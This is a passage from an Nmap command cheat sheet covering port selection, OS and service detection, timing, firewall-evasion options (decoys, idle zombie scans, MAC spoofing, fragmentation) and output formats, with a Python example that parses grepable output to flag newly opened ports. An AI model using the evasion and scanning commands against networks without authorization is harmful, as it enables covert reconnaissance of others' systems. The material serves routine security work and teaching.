| Scan Ports by Protocol | nmap -sU -sT -p U:[ports],T:[ports] [target] | nmap -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.0.1 |
| Scan All Ports | nmap -p '*' [target] | nmap -p '*' 192.168.0.1 |
| Scan Top Ports | nmap --top-ports [number] [target] | nmap --top-ports 10 192.168.0.1 |
| Perform a Sequential Port Scan | nmap -r [target] | nmap -r 192.168.0.1 |
VERSION DETECTION
| Goal | Command | Example |
|---|---|---|
| Operating System Detection | nmap -O [target] | nmap -O 192.168.0.1 |
| Submit TCP/IP Fingerprints | www.nmap.org/submit/ | |
| Attempt to Guess an Unknown OS | nmap -O --osscan-guess [target] | nmap -O --osscan-guess 192.168.0.1 |
| Service Version Detection | nmap -sV [target] | nmap -sV 192.168.0.1 |
| Troubleshooting Version Scans | nmap -sV --version-trace [target] | nmap -sV --version-trace 192.168.0.1 |
| Perform a RPC Scan | nmap -sR [target] | nmap -sR 192.168.0.1 |
TIMING OPTIONS
| Goal | Command | Example |
|---|---|---|
| Timing Templates | nmap -T[0-5] [target] | nmap -T3 192.168.0.1 |
| Set the Packet TTL | nmap --ttl [hops] [target] | nmap --ttl 64 192.168.0.1 |
| Minimum # of Parallel Operations | nmap --min-parallelism [number] [target] | nmap --min-parallelism 10 192.168.0.1 |
| Maximum # of Parallel Operations | nmap --max-parallelism [number] [target] | nmap --max-parallelism 1 192.168.0.1 |
| Minimum Host Group Size | nmap --min-hostgroup [number] [targets] | nmap --min-hostgroup 50 192.168.0.1 |
| Maximum Host Group Size | nmap --max-hostgroup [number] [targets] | nmap --max-hostgroup 1 192.168.0.1 |
| Initial RTT Timeout | nmap --initial-rtt-timeout [time] [target] | nmap --initial-rtt-timeout 100ms 192.168.0.1 |
| Maximum RTT Timeout | nmap --max-rtt-timeout [time] [target] | nmap --max-rtt-timeout 100ms 192.168.0.1 |
| Maximum Retries | nmap --max-retries [number] [target] | nmap --max-retries 10 192.168.0.1 |
| Host Timeout | nmap --host-timeout [time] [target] | nmap --host-timeout 30m 192.168.0.1 |
| Minimum Scan Delay | nmap --scan-delay [time] [target] | nmap --scan-delay 1s 192.168.0.1 |
| Maximum Scan Delay | nmap --max-scan-delay [time] [target] | nmap --max-scan-delay 10s 192.168.0.1 |
| Minimum Packet Rate | nmap --min-rate [number] [target] | nmap --min-rate 50 192.168.0.1 |
| Maximum Packet Rate | nmap --max-rate [number] [target] | nmap --max-rate 100 192.168.0.1 |
| Defeat Reset Rate Limits | nmap --defeat-rst-ratelimit [target] | nmap --defeat-rst-ratelimit 192.168.0.1 |
FIREWALL EVASION TECHNIQUES
| Goal | Command | Example |
|---|---|---|
| Fragment Packets | nmap -f [target] | nmap -f 192.168.0.1 |
| Specify a Specific MTU | nmap --mtu [MTU] [target] | nmap --mtu 32 192.168.0.1 |
| Use a Decoy | nmap -D RND:[number] [target] | nmap -D RND:10 192.168.0.1 |
| Idle Zombie Scan | nmap -sI [zombie] [target] | nmap -sI 192.168.0.38 192.168.0.1 |
| Manually Specify a Source Port | nmap --source-port [port] [target] | nmap --source-port 1025 192.168.0.1 |
| Append Random Data | nmap --data-length [size] [target] | nmap --data-length 20 192.168.0.1 |
| Randomize Target Scan Order | nmap --randomize-hosts [target] | nmap --randomize-hosts 192.168.0.1-20 |
| Spoof MAC Address | nmap --spoof-mac [MAC|0|vendor] [target] | nmap --spoof-mac Cisco 192.168.0.1 |
| Send Bad Checksums | nmap --badsum [target] | nmap --badsum 192.168.0.1 |
OUTPUT OPTIONS
| Goal | Command | Example |
|---|---|---|
| Save Output to a Text File | nmap -oN [scan.txt] [target] | nmap -oN scan.txt 192.168.0.1 |
| Save Output to a XML File | nmap -oX [scan.xml] [target] | nmap -oX scan.xml 192.168.0.1 |
| Grepable Output | nmap -oG [scan.txt] [targets] | nmap -oG scan.txt 192.168.0.1 |
| Output All Supported File Types | nmap -oA [path/filename] [target] | nmap -oA ./scan 192.168.0.1 |
| Periodically Display Statistics | nmap --stats-every [time] [target] | nmap --stats-every 10s 192.168.0.1 |
| 133t Output | nmap -oS [scan.txt] [target] | nmap -oS scan.txt 192.168.0.1 |
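The grepable (`-oG`) format in the table above is the one you would feed to scripts. As an added example that is not part of the cheat sheet or of Nmap itself, here is a Python parser for a constructed `-oG` sample (the hosts, services and version strings are made up) that extracts each host's open ports and compares them with a constructed baseline, so that a newly exposed service stands out between two scans of your own network.

```python
# Constructed Nmap grepable (-oG) output; the hosts, services and version strings are made up.
GREPABLE_SAMPLE = (
    "# Nmap 6.47 scan initiated (constructed sample, not real scan output)\n"
    "Host: 192.168.0.1 ()\tStatus: Up\n"
    "Host: 192.168.0.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.6.1p1/, "
    "80/open/tcp//http//nginx 1.4.6/, 443/closed/tcp//https///, "
    "8080/filtered/tcp//http-proxy///\tIgnored State: closed (996)\n"
    "Host: 192.168.0.2 ()\tStatus: Up\n"
    "Host: 192.168.0.2 ()\tPorts: 53/open/udp//domain//dnsmasq 2.66/\tIgnored State: open|filtered (999)\n"
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned\n"
)


def parse_grepable(text):
    """Parse -oG output into {ip: {"status": str, "ports": [record, ...]}}.
    Fields on a Host: line are tab-separated; each port record is
    port/state/protocol/owner/service/rpc-info/version/ and records are comma-separated."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and anything else are ignored
        fields = line.split("\t")
        ip = fields[0].split()[1]
        entry = hosts.setdefault(ip, {"status": None, "ports": []})
        for field in fields[1:]:
            if field.startswith("Status:"):
                entry["status"] = field.split(":", 1)[1].strip()
            elif field.startswith("Ports:"):
                for item in field[len("Ports:"):].split(","):
                    parts = item.strip().split("/")
                    if len(parts) < 7:
                        continue  # malformed record: skip rather than guess
                    port, state, proto, _owner, service, _rpc, version = parts[:7]
                    entry["ports"].append({"port": int(port), "state": state,
                                           "proto": proto, "service": service,
                                           "version": version})
    return hosts


def open_ports(hosts):
    """{ip: [(port, proto, service), ...]} for ports reported open."""
    return {ip: [(p["port"], p["proto"], p["service"])
                 for p in h["ports"] if p["state"] == "open"]
            for ip, h in hosts.items()}


def newly_opened(baseline, hosts):
    """Ports open now that were not open in the baseline {ip: {(port, proto), ...}}."""
    current = {ip: {(port, proto) for port, proto, _ in ports}
               for ip, ports in open_ports(hosts).items()}
    return {ip: sorted(ports - baseline.get(ip, set()))
            for ip, ports in current.items() if ports - baseline.get(ip, set())}


# Constructed baseline from an earlier (imaginary) scan of the same two hosts.
BASELINE = {"192.168.0.1": {(22, "tcp"), (80, "tcp")}, "192.168.0.2": set()}


if __name__ == "__main__":
    scan = parse_grepable(GREPABLE_SAMPLE)
    for ip, ports in open_ports(scan).items():
        print(ip, ports)
    print("newly opened:", newly_opened(BASELINE, scan))
```

Scheduling a scan with `-oA` and diffing the `.gnmap` file against the previous run in this way is a cheap change-detection control: the interesting output is not the port list itself but the entry that was not there last week.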
TROUBLESHOOTING AND DEBUGGING
| Goal | Command | Example |
|---|---|---|
| Getting Help | nmap -h | nmap -h |
| Display Nmap Version | nmap -V | nmap -V |
| Verbose Output | nmap -v [target] | nmap -v 192.168.0.1 |
| Debugging | nmap -d [target] | nmap -d 192.168.0.1 |
| Display Port State Reason | nmap --reason [target] | nmap --reason 192.168.0.1 |
| Only Display Open Ports | nmap --open [target] | nmap --open 192.168.0.1 |
| Trace Packets | nmap --packet-trace [target] | nmap --packet-trace 192.168.0.1 |
| Display Host Networking | nmap --iflist | nmap --iflist |
| Specify a Network Interface | nmap -e [interface] [target] | nmap -e eth0 192.168.0.1 |
NMAP SCRIPTING ENGINE
| Goal | Command | Example |
|---|---|---|
| Execute Individual Scripts | nmap --script [script.nse] [target] | nmap --script banner.nse 192.168.0.1 |
| Execute Multiple Scripts | nmap --script [expression] [target] | nmap --script 'http-*' 192.168.0.1 |
| Script Categories | all, auth, default, discovery, external, intrusive, malware, safe, vuln | |
| Execute Scripts by Category | nmap --script [category] [target] | nmap --script 'not intrusive' 192.168.0.1 |
| Execute Multiple Script Categories | nmap --script [category1,category2,etc] | nmap --script 'default or safe' 192.168.0.1 |
| Troubleshoot Scripts | nmap --script [script] --script-trace [target] | nmap --script banner.nse --script-trace 192.168.0.1 |
| Update the Script Database | nmap --script-updatedb | nmap --script-updatedb |
Download NMap